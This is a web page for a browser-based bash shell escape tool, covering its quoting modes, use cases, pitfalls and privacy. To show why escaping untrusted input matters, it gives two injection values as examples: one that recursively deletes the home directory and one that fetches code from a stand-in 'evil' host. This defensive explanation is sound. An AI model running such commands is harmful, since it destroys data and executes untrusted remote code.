Quote any string for bash safely: single-quote wrap, double-quote escape, backslash mode, and reverse, all in your browser
- Runs locally
- Category Developer & DevOps
- Best for Formatting, validating, shrinking, or inspecting code-adjacent text.
Wraps the whole string in single quotes. A literal ' becomes '\'' . Inside single quotes $ ` \ ! are all literal, so this is the safest option.
What this tool does
Shell escape turns an arbitrary string into a form you can paste straight into a bash or POSIX shell command without it breaking the line, leaking a variable, or opening an injection hole. A filename like my file.txt, an argument holding $HOME, a literal quote, a backtick or a newline are all handled. Pick one of three modes: single-quote wrap (the safest, where the whole string goes inside single quotes and an inner quote becomes the classic close-escape-reopen idiom), double-quote escape (which backslashes the four characters still special inside double quotes), or backslash mode (which prefixes every shell metacharacter individually). A reverse mode decodes a quoted argument back to the plain text, so you can read what a copied command actually contains. Everything runs as plain JavaScript in your tab, nothing is uploaded, and the input round-trips through the URL so a shared link reopens the exact same escaped argument.
Tool details
- Input
- Files + Text
- The page exposes text boxes, numeric controls, file pickers, or structured inputs depending on the tool.
- Output
- Live result + Copy
- The result area focuses on usable output, with copy, download, or preview actions when supported.
- Privacy
- Browser-side processing
- The main tool logic does not call an external API, so inputs normally stay in the current tab.
- Save / share
- Shareable URL state
- Key settings are encoded in the URL so another person can reopen the same setup.
- Performance budget
- Initial JS <= 9 KB
- No WASM budget is declared, keeping the tool quick to open on mobile.
- Best fit
- Developer & DevOps · Developer
- Category and role tags drive related tools, internal links, and quick fit checks.
How to use
-
1. Input
Paste or drop your content into the tool panel.
-
2. Process
Click the button. All processing is local in your browser.
-
3. Copy / Download
Copy the result or download to disk in one click.
How Shell Escape fits into your work
Use it in the small gaps between coding, reviewing, debugging, and shipping.
Developer jobs
- Formatting, validating, shrinking, or inspecting code-adjacent text.
- Preparing snippets for documentation, tickets, commits, or handoff.
- Checking a small payload quickly without switching tools.
Developer checks
- Run irreversible transforms like minify or obfuscate on a copy.
- Keep secrets out of pasted snippets unless the tool explicitly stays local.
- Use your normal tests or linter before shipping transformed code.
Good next steps
These links move the current task into a more complete workflow.
- 1 Bash Cheatsheet Bash cheat sheet — 100+ commands & idioms for variables, conditionals, loops, functions, pipes, traps, with real one-liners. Open
- 2 String Escape / Unescape Escape & unescape strings for JSON, JS, Java, C, SQL, Shell, HTML, CSV & regex — both directions — browser-only Open
- 3 Regex Escape Turn literal text into a safe regex pattern: a.b becomes a\.b, copy the ready /…/ form, reverse it too, all in your browser Open
Real-world use cases
Pass a filename with spaces to cp, mv or rm
You have a download named invoice 2026 final.pdf and need to move it from a script. Pasting it bare into mv makes the shell read three arguments and the command fails or moves the wrong files. Paste the name here, copy the single-quoted result, and drop it into your command as one safe path. No more renaming files just to avoid the spaces.
Build a shell command from untrusted user input
A web form or CLI takes a value and you assemble a shell command from it. Without escaping, a value like ; rm -rf ~ or $(curl evil.sh) runs as code, not data. Single-quote wrap the value first and the shell treats it as one literal argument with no expansion or splitting, which closes the most common shell injection hole.
Embed a literal dollar sign or backtick in a command
You want to echo the literal text Price is $9.99 or pass a password containing a backtick. Unescaped, the shell tries to expand $9 and run the backticked text. Escape it here and the special characters arrive as plain text, so the value your program receives is exactly what you typed instead of a mangled, partially expanded string.
Decode a copied command to see what it really runs
Someone pastes you a one-liner full of quotes and backslashes and you want to know the actual argument before you run it. Switch to reverse mode, paste the quoted chunk, and read back the plain text. It is a fast safety check for commands copied off the internet, where a quoted blob can hide a surprising payload.
Common pitfalls
Double quoting a value that already expands. Inside double quotes $VAR and `cmd` still run, so wrapping untrusted input in double quotes does not stop injection. Use single-quote wrap when the value comes from outside your program, and reserve double quotes for text you control that needs a variable to expand on purpose.
Trying to backslash a single quote inside single quotes. A backslash is literal inside single quotes, so 'it\'s' does not work and leaves the shell waiting for a closing quote. The only correct way is the close-escape-reopen idiom 'it'\''s', which this tool produces automatically. Hand-written escapers get this wrong constantly.
Forgetting the newline trap in backslash mode. A backslash directly before a newline is a line continuation, not a literal newline, so escaping a multi-line value char by char silently joins the lines. This tool emits a quoted newline instead, but a naive escaper that only prefixes specials with backslash will eat your line breaks.
Privacy
The text you paste, the escaping, the reverse pass and the result are all computed by plain JavaScript inside your browser tab. Nothing is sent to a server and nothing is logged. The one thing to know: the input is encoded into the page URL so a shared link reopens the same escaped argument, which means a link you paste into chat records that text in the recipient server's access log. If you are escaping a password, token or any secret to put on a command line, do not share the URL. Use the copy button and paste only the result, and remember that secrets on a real command line can also land in your shell history.
FAQ
Tool combos
Folks in your role tend to reach for these alongside this tool.
- Add Line Numbers Number every line of pasted text — set start, step and separator, zero-pad to align, skip blanks, or strip numbers back off — browser-only
- AES Text Encryptor Encrypt & decrypt text with a password — AES-256-GCM + PBKDF2 via WebCrypto — 100% in your browser, nothing uploaded
- Affine Cipher Encoder & Decoder Encrypt and decrypt the ax+b affine cipher with live modular-inverse check, browser-only
- Age Difference Calculator The exact gap between two birthdays — years/months/days, percentage, and the date one person is twice the other's age — browser-only